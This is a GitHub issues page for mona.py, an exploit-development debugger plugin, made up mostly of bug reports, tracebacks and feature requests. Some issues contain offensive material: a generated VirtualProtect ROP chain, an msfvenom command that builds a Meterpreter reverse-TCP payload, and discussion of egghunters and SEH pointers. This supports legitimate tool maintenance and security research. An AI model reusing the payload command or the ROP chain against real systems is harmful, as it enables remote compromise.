corelan / mona
Corelan Repository for mona.py
License: BSD 3-Clause "New" or "Revised" License
When opening a new issue, please fill out the following sections:
mona.py completes the ropchain/rop chain creation function.
Mona throws errors when trying to produce a VirtualProtect ropchain. The issue is the same case as someone had here (#44), but I got more errors.
************* Symbol Loading Error Summary **************
Module name Error
Tee710 The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2951, in getIAT
thisfuncfullname = thisfunc.getName().lower()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1819, in getName
syms = thismod.getSymbols()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1556, in getSymbols
ntHeader = getNtHeaders(self.modbase)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 109, in getNtHeaders
return pykd.module("ntdll").typedVar(ntheaders, modulebase + pykd.ptrDWord(modulebase + 0x3c))
TypeException: _IMAGE_NT_HEADERS : symbol name is not found
** Error trying to process module TeeUI710.bpl
** Error trying to process module TeeUI710.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module JvDlgs100.bpl
** Error trying to process module JvDlgs100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module vclactnband100.bpl
** Error trying to process module vclactnband100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module JvStdCtrls100.bpl
** Error trying to process module JvStdCtrls100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module rtl100.bpl
** Error trying to process module rtl100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module VclSmp100.bpl
** Error trying to process module VclSmp100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module TeeDB710.bpl
** Error trying to process module TeeDB710.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module xmlrtl100.bpl
** Error trying to process module xmlrtl100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module JclVcl100.bpl
** Error trying to process module JclVcl100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module Windows.StateRepositoryPS.dll
********************************************************************************
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 19097, in main
commands[command].parseProc(opts)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 12050, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 6558, in findROPGADGETS
vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 8812, in createRopChains
thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 9572, in getPickupGadget
allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 7601, in findPattern
outside = getRangesOutsideModules()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5344, in getRangesOutsideModules
populateModuleInfo()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5818, in populateModuleInfo
thismod = MnModule(key)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2720, in __init__
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
********************************************************************************
Thank you for your help, Peter.
I'm trying to see if Mona has installed correctly by running simple commands against Notepad++. Below is the output that Mona gives me when I run the rop command (other commands that need module information appear to give similar output). This is on Windows 8.1 x64 (running a 32-bit debugger).
0:009> !py mona rop
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py rop
---------- Mona command started on 2015-05-02 13:15:18 (v2.0, rev 557) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module image74150000
** Error trying to process module image00400000
** Error trying to process module kernel.appcore.dll
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 17996, in main
commands[command].parseProc(opts)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 11257, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5961, in findROPGADGETS
modulestosearch = getModulesToQuery(modulecriteria)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5373, in getModulesToQuery
populateModuleInfo()
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5488, in populateModuleInfo
thismod = MnModule(key)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 2493, in __init__
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
When I use mona.py to create the ROP chains, it stops at this position:
[+] Creating suggestions list
[+] Processing suggestions
[+] Launching ROP generator
[+] Attempting to produce rop chain for VirtualProtect
Step 1/7: esi
I have been waiting for many hours, and it is still paused there.
The env:
pykd 0.3
The Os:
windows 8
The python:
python 2.7
The commands:
.load pykd
!py mona
!py mona config -set workingfolder "C:\logs%p"
!py mona rop -m kernel32.dll,ntdll,msvcr120.dll
Hi there,
I am trying to use the mona.py module with Immunity Debugger v1.85 but I get the error message "pycommands: error importing module."
I already placed the mona.py file inside the pycommands folder.
Regards,
List the modules that don't have any memory checks
Type !mona modules
mona "current version" as of 10/16/2018, immunity debugger version 1.85, python 2.7.15, windows 10 64 current version
pycommands: error importing module
Windows 10 Home Native (no VM)
Immunity debugger using command !mona
Python 2.7 32-bit
PATH added
Other commands working like !list or !heap or !mike
I can see when I run any other command a .pyc file is created but that never happens when trying to use mona commands.
I verified the size of mona.py file and privileges. It keeps showing "pycommands: error importing module"
Please help
get rop chain
[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll
Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'
2:033> !py mona rop -m mshtml.dll
Hold on...
[+] Command used:
!py mona.py rop -m mshtml.dll
---------- Mona command started on 2022-10-27 22:17:13 (v2.0, rev 618) ----------
[+] Processing arguments and criteria
- Pointer access level : X
- Only querying modules mshtml.dll
[+] Generating module info table, hang on...
- Processing modules
- Done. Let's rock 'n roll.
[+] Preparing output file '_rop_progress_iexplore.exe_2592.log'
- (Re)setting logfile _rop_progress_iexplore.exe_2592.log
[+] Progress will be written to _rop_progress_iexplore.exe_2592.log
[+] Maximum offset : 40
[+] (Minimum/optional maximum) stackpivot distance : 8
[+] Max nr of instructions : 6
[+] Split output into module rop files ? False
[+] Going to create rop chains for all relevant/supported techniques:
[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll
Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'
windbg6.12
windows7 Pro
mshtml ver: File version: 8.0.7600.16385
Hello Peter,
I happened to dig into the implementation of the findwild command and discovered an undocumented and unimplemented -type switch.
If you don't plan to implement this feature then the code associated with it can be safely removed (I pinned it in my local repository and can send a pull request if you approve).
On the other hand, if you plan to implement it, how useful will wildcard search be for the bin (opcode sequence) type? Is there a need to search for bytes, for example, like this -- \xFF?\x24*\x1C -- with (?) representing a single byte, and (*) representing any number of bytes? (I really don't know the answer to this question since I'm just getting into exploit development.)
Checking RM2MP3Converter on Win 7 Ultimate x64, an invalid opcode was returned in rop.txt
0x100150xx : # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN ** [MSRMfilter03.dll] ** | {PAGE_EXECUTE_READ}
0x100150xx : # LEA EDX,ESP # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN ** [MSRMfilter03.dll] ** | {PAGE_EXECUTE_READ}
As can be seen, LEA EDX,ESP has been suggested, which is an invalid opcode, AFAIK.
Code is written in Python 3.
Code is written in Python 2.7.
Check dependencies in README.md file.
Python 2.7 is EOL as of 9 days ago, (01/01/2020).
It seems the functions for finding ROP gadgets only assume that they are on the x86 architecture. Is support for amd64 in development?
Mona should spit back data when launched (!mona) from the Immunity Debugger 1.85
pycommands: error importing module
....
line 87 in
import urllib ...
installed Immunity Debugger and updated from python 2.7.1 to python 2.7.14
added mona.py to the PyCommands folder
started Immunity Debugger as an admin
use !mona
OS: Windows 7 x64 SP 1
immunity debugger 1.85
mona.py completes the ropchain/rop chain creation function.
mona.py hangs at Step 1/7 for finding gadgets for VirtualProtect, outputting the following. (See picture below.)
Open WinDBG x86, attach to an already running x86 program, and run .load pykd.pyd; followed by either !py mona rop or !py mona rop -m kernel32.dll
Latest pykd (0.3.2.2), latest mona.py revision (2.0 r599), Windows 10 Pro x64, WinVer 1809, WinDBG x86. I have used this against my target along with !py mona rop -m kernel32.dll. (Presumably) both progress to another error (this was after me going to sleep) which I regret not logging, mentioning .symfix. Same results.
- Run in a vanilla FLARE_VM, aside from software I am trying to exploit. _NT_SYMBOL_PATH = srv*c:\symbols*http://msdl.microsoft.com/download/symbols
Have had issues with mona/windbglib in the past, reference here
Edit: Seems to be a symbol problem. Taking a VM snapshot and will experiment. I'm a primary Linux guy, any help is appreciated.
^ Related error.
tier0.dll is a proprietary, non-standard .dll - could this be why?
Request feature x64dbg/x64dbgpy#6
Mona.py should create rop_chains.txt and rop.txt files after running one of the following commands:
!mona rop -m slmfc.dll -n -cpb "\x00\x0a\x0d"
!mona rop -m slmfc.dll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n -cpb "\x00\x0a\x0d"
!mona rop
!mona rop -m slmfc.dll
Mona throws an _rop_progress_SLmail.exe_1164.log error (see screenshot).
I see a "local variable referenced before assignment" error on a splash screen (could not capture that error though).
Hi,
I used the latest version of Mona.py and had a bug when calculating the return address to VirtualProtect: it forgot to account for an add al,0EFh that will occur before the VirtualProtect call.
Thanks for the helpful tool though,
Gadi
*** [ Ruby ] ***
def create_rop_chain()
  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets =
  [
    0x7c373fda, # POP EBP # RETN [msvcr71.dll]
    0x7c373fda, # skip 4 bytes [msvcr71.dll]
    0x7c376747, # POP EAX # RETN [msvcr71.dll]
    0xfffffdff, # Value to negate, will become 0x00000201
    0x7c352155, # NEG EAX # RETN [msvcr71.dll]
    0x7c341748, # POP EBX # RETN [msvcr71.dll]
    0xffffffff, #
    0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
    0x7c363cff, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
    0x7c344f8e, # POP EDX # RETN [msvcr71.dll]
    0xffffffc0, # Value to negate, will become 0x00000040
    0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
    0x7c34f7a0, # POP ECX # RETN [msvcr71.dll]
    0x7c38fd9f, # &Writable location [msvcr71.dll]
    0x7c342953, # POP EDI # RETN [msvcr71.dll]
    0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]
    0x7c36374d, # POP ESI # RETN [msvcr71.dll]
    0x7c3415a2, # JMP [EAX] [msvcr71.dll]
    0x7c34728e, # POP EAX # RETN [msvcr71.dll]
    0x7c37a140, # ptr to &VirtualProtect() [IAT msvcr71.dll] ---- BUG: should be 0x7c37a151 (eax becomes 0x7c37a140 after add al,0EFh)
    0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
    0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
  ].flatten.pack("V*")
  return rop_gadgets
end
Mona version:
"""
VERSION = '2.0'
REV = filter(str.isdigit, '$Revision: 545 $')
IMM = '1.8'
DEBUGGERAPP = ''
arch = 32
win7mode = False
Work in progress: https://github.com/wangray/mona
How likely is this to get merged? Should we maintain x64dbg support separately? @corelanc0d3r
jmp esp
upon executing !mona jmp -r esp
!mona jmp -r esp command and observe the output
!mona find -s '\xff\xe4' this works fine
The script should run without crashing even if a system uses Python3 as default.
The script crashes when loaded with Python3, the current supported version which is becoming more standard.
python mona.py on a system for which Python3 is default.
I suggest adding the following shebang to mona.py.
#!/usr/bin/env python2.7
As an example, trying to load Mona from Immunity Debugger on a Windows system with Python3 as default will result in an error. By adding that shebang, Mona loads fine if the system also has Python2.7 installed.
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/tools.html#Mona
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool and improve its referencing.
The badge shows to your community that you are inventoried. It looks good but also shows you care about your project, that your tool is referenced.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that, but there are several styles available.
If you want to thank us, you can help make our open project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care. Else you can close this issue.
0:015> !nmod
00030000 0003c000 CRYPTBASE NO_SEH *ASLR *DEP C:\Windows\syswow64\CRYPTBASE.dll
00230000 00239000 netutils /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\netutils.dll
00240000 0024f000 wkscli /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wkscli.dll
00320000 0032d000 wshbth /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wshbth.dll
00330000 0033a000 NO_SEH *ASLR *DEP C:\Program Files (x86)\masked\masked.dll
Narly and SafeSEH say my module masked.dll is SafeSEH OFF. But mona on WinDbg and Immunity doesn't say the same. In fact, I see 4-6 non-SafeSEH modules with other plugins but mona says all are SEH protected. Probably that's why "!mona seh" results in nothing.
Tested on Windows 7 64-bit with WinDbg:6.12.0002.633 x86 and Immunity v1.85
Where is the priority:ultra-low switch? :)
For some reason the reference to my URL in one of the comments has a typo:
http://www.floyd.cd
it should be
http://www.floyd.ch
cheers,
floyd
Setup -- OS: Windows XP SP 3 Eng, program - Easy RM to MP3 Converter (from Exploit Writing Tutorial, part 1 on corelan.be), latest version of mona recently pulled from Github, Immunity Debugger v1.85
Command !mona seh
finds duplicate addresses and gives an incorrect instruction for the opcode sequence in one of the found cases:
0x00436213 : jmp dword ptr ss:[esp+1c] | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0x00436213 : call dword ptr ss:[esp+1c] | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
The opcode at the 0x00436213 address is FF54241C, which corresponds to the call dword [esp+0x1c] instruction.
The plug-in was installed in accordance with the https://github.com/corelan/windbglib
I tried different versions of this plugin, including the last one
I assume that this error has been discussed many times, but I have not found solutions to this problem
0:000> !py mona jmp -r ESP
Hold on...
[+] Command used:
!py mona.py jmp -r ESP
---------- Mona command started on 2017-10-15 04:41:48 (v2.0, rev 570) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
Traceback (most recent call last):
File "mona.py", line 18207, in main
commands[command].parseProc(opts)
File "mona.py", line 11212, in procFindJMP
all_opcodes=findJMP(modulecriteria,criteria,args["r"].lower().strip())
File "mona.py", line 5846, in findJMP
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5466, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5577, in populateModuleInfo
allmodules=dbg.getAllModules()
File "C:\dbgs\WinDbg\windbglib.py", line 1160, in getAllModules
getModulesFromPEB()
File "C:\dbgs\WinDbg\windbglib.py", line 366, in getModulesFromPEB
moduleLst = pykd.typedVarList(peb.Ldr.deref().InLoadOrderModuleList, "ntdll!_LDR_DATA_TABLE_ENTRY", "InMemoryOrderLinks.Flink")
TypeException: _LDR_DATA_TABLE_ENTRY : symbol name is not found
Summary:
I've been working on a feature to compare a file created by msfvenom/gdb/hex/xxd/hexdump/ollydbg with a copy in memory. It is similar to the "compare" command, but instead of reading from a binary file, it reads and parses output from msfvenom, gdb, and a few others.
The idea is to quickly compare the integrity of the injected shellcode.
The feature is ported from expdevBadChars (https://github.com/mgeeky/expdevBadChars), which I find quite useful.
I've written a working alpha build on a forked branch, but the code still needs some touch-up before I submit a PR. I am just wondering if you are OK with the added feature and would consider a merge upstream?
https://github.com/onlylonly/mona/tree/advcompare-alpha
Example
Some demonstration & example of the proposed feature
content of file 2a.txt
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.106 LPORT=4444 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of py file: 1644 bytes
the mona command
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80
or
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80 -t msfvenom-python
If the -t parameter (format type) is supplied, mona will honor the user-supplied format; otherwise, mona will attempt to guess the format type based on a regular expression.
Looking forward to hearing from you, and thanks for sharing and maintaining mona.py. It's a wonderful tool.
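The advcompare idea described in the post, as an added example that is neither mona's code nor the linked fork's: a Python 3 sketch that parses the msfvenom -f py and xxd dump formats, guesses the format from the text when no type is given (the -t default the post describes), and reports where the in-memory copy diverges. All function names and both sample dumps are constructed for this example; the eight sample bytes are arbitrary test data, not a payload.

```python
import re

# Constructed sample in the shape of msfvenom "-f py" output (like the 2a.txt
# in the post). The bytes are arbitrary test data.
SAMPLE_MSFVENOM_PY = r'''
No encoder or badchars specified, outputting raw payload
Payload size: 8 bytes
buf = ""
buf += "\x41\x42\x00\x0a"
buf += "\x0d\x43\x44\x45"
'''

# Constructed sample of xxd output for the same eight bytes.
SAMPLE_XXD = '''
00000000: 4142 000a 0d43 4445                      AB...CDE
'''

# A 'buf += "\x.."' line: group 1 is the run of \xNN escapes.
_PY_BUF_LINE = re.compile(r'^\s*buf\s*\+=\s*"((?:\\x[0-9a-fA-F]{2})*)"\s*$')
# An xxd line starts with an 8-digit hex offset and a colon.
_XXD_LINE = re.compile(r'^[0-9a-fA-F]{8}:\s')


def parse_msfvenom_py(text):
    """Collect the bytes from every 'buf += "..."' line, in order."""
    out = bytearray()
    for line in text.splitlines():
        m = _PY_BUF_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace('\\x', ''))
    return bytes(out)


def parse_xxd(text):
    """Collect the hex columns of each xxd line, stopping at the ASCII column."""
    out = bytearray()
    for line in text.splitlines():
        if not _XXD_LINE.match(line):
            continue
        for token in line.split(':', 1)[1].split():
            # The ASCII column is the first token that is not clean even-length hex.
            # (An ASCII column made only of hex digits would fool this simple rule.)
            if len(token) % 2 or not re.fullmatch(r'[0-9a-fA-F]+', token):
                break
            out += bytes.fromhex(token)
    return bytes(out)


PARSERS = {'msfvenom-python': parse_msfvenom_py, 'xxd': parse_xxd}


def guess_format(text):
    """Pick a parser from the shape of the text (the behaviour when -t is absent)."""
    lines = text.splitlines()
    if any(_PY_BUF_LINE.match(l) for l in lines):
        return 'msfvenom-python'
    if any(_XXD_LINE.match(l) for l in lines):
        return 'xxd'
    raise ValueError('unrecognised dump format; pass fmt explicitly')


def compare_bytes(expected, memory):
    """Return (status, mismatches); each mismatch is (offset, expected, actual),
    with actual None when the memory snapshot is shorter than expected."""
    mismatches = [(i, b, memory[i] if i < len(memory) else None)
                  for i, b in enumerate(expected)
                  if i >= len(memory) or memory[i] != b]
    if not mismatches:
        status = 'unmodified'
    elif all(actual is None for _, _, actual in mismatches):
        status = 'truncated'
    else:
        status = 'corrupted'
    return status, mismatches


def mangled_bytes(mismatches):
    """Distinct original byte values that did not survive the copy into memory."""
    return sorted({b for _, b, actual in mismatches if actual is not None})


def advcompare(text, memory, fmt=None):
    """Parse the dump (honouring fmt if given) and diff it against a memory snapshot."""
    fmt = fmt or guess_format(text)
    expected = PARSERS[fmt](text)
    status, mismatches = compare_bytes(expected, memory)
    return {'format': fmt, 'length': len(expected), 'status': status,
            'mismatches': mismatches, 'mangled_bytes': mangled_bytes(mismatches)}
```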
Hi,
I tried to use an egghunter with checksum verification generated by mona but it crashed.
Through step by step execution I identified that the last conditional jump was wrong.
You'll find the corresponding mona output attached to this message.
You can easily see what I'm talking about by copying / pasting the egghunter into a debugger.
You'll see that the last conditional jump points to an address between two instructions.
I thought at first that it was a sort of code length optimization but this is not the case.
To fix it I modified the jump to point to the "INC EDX".
If "Debugging options -> Disasm -> Disassemble in lowercase" is enabled, !mona rop produces invalid results. !mona stackpivot doesn't produce any results.
Suggestions on how to fix this (pick one):
!mona modules should be running
Error dll load failed 1 is not a valid win32 application
1, Download mona
2, Copy it to pycommands of ID
3, run !mona modules
4, Got error: dll load failed 1 is not a valid win32 application
Mona: Newest version
ID: v1.85
OS: Windows 10 (64 bits)
Once I execute a command, it'll give me this information.
My OS is Windows 7 64-bit.
I installed both 32-bit WinDbg and 64-bit WinDbg.
The 32-bit WinDbg can execute the mona plugin successfully, but the 64-bit WinDbg gives me this information:
0:000> !py mona modules
Hold on...
[+] Command used:
!py mona.py modules
---------- Mona command started on 2016-12-13 01:39:34 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll
Traceback (most recent call last):
File "mona.py", line 18183, in main
commands[command].parseProc(opts)
File "mona.py", line 11240, in procShowMODULES
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5442, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5557, in populateModuleInfo
thismod = MnModule(key)
File "mona.py", line 2538, in __init__
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
and every command still can't be executed
0:000> !py mona rop
Hold on...
[+] Command used:
!py mona.py rop
---------- Mona command started on 2016-12-13 01:45:00 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll
Traceback (most recent call last):
File "mona.py", line 18183, in main
commands[command].parseProc(opts)
File "mona.py", line 11341, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
File "mona.py", line 6033, in findROPGADGETS
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5442, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5557, in populateModuleInfo
thismod = MnModule(key)
File "mona.py", line 2538, in __init__
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
Typically, a README.md file contains a summary of what the project is/does, and also contains references to further documentation.
There is no documentation found in this repository.
Check the README.md file for any documentation or references.
N/A
Possible to use the mona plugin in Immunity Debugger 1.85.
!mona
PyCommands: error importing module
add mona.py to the PyCommands folder
start Immunity Debugger
use !mona
OS: Windows xp
Immunity Debugger 1.85
Is it possible to automate the process of opening Immunity Debugger and running mona without needing to open the GUI and type !mona to run the file?
I want to write a separate Python file to do that. Is it possible through the API?
Hi,
Sometimes we can control values at esp-0x???, it would be great if the -distance option can take a negative value :)
Thank you
Crash when I run the command: !mona rop -m ntdll
Included exe file and log files:
_rop_progress_for_testing.exe_1792.log
Log.txt
for_testing_exe_.txt
Windows 7 SP1 syswow64 folder: ntdll_dll_.txt
Windows 7 x64 on vmware workstation
4 GB RAM for the VM!
I am running Immunity debugger as administrator
Installed visual studio 2017 c++ redistributable x32
Python 2.7.16 (v2.7.16:413a49145e, Mar 4 2019, 01:30:55) [MSC v.1500 32 bit (Intel)] on win32
Immunity debugger 1.85
Mona Plugin version : 2.0 r585 (latest update)
With a custom workingfolder configured, when using !mona compare -a ESP -f bytearray.bin the file bytearray.bin should be found in the workingfolder.
Unable to find/read file bytearray.bin
!mona config -set workingfolder C:\immdbg\%p
!mona bytearray
!mona compare -a ESP -f bytearray.bin
Hi :)
I think it could be helpful if the output to rop.txt (and possibly other files as well?) would be sorted, by anything. I would use a default sorting by address, but perhaps if there are more sorting ideas it's possible to add a command line flag to change default behavior.
Sounds to me like it's basically casting a set to a list and calling sort at some point in the code, but seeing as it's an 18+ KLOC file, it's hard for me to tell for certain.
Just seeing if anyone else is having 'Error importing module' when importing into Immunity Debugger 1.85, 32-bit OS.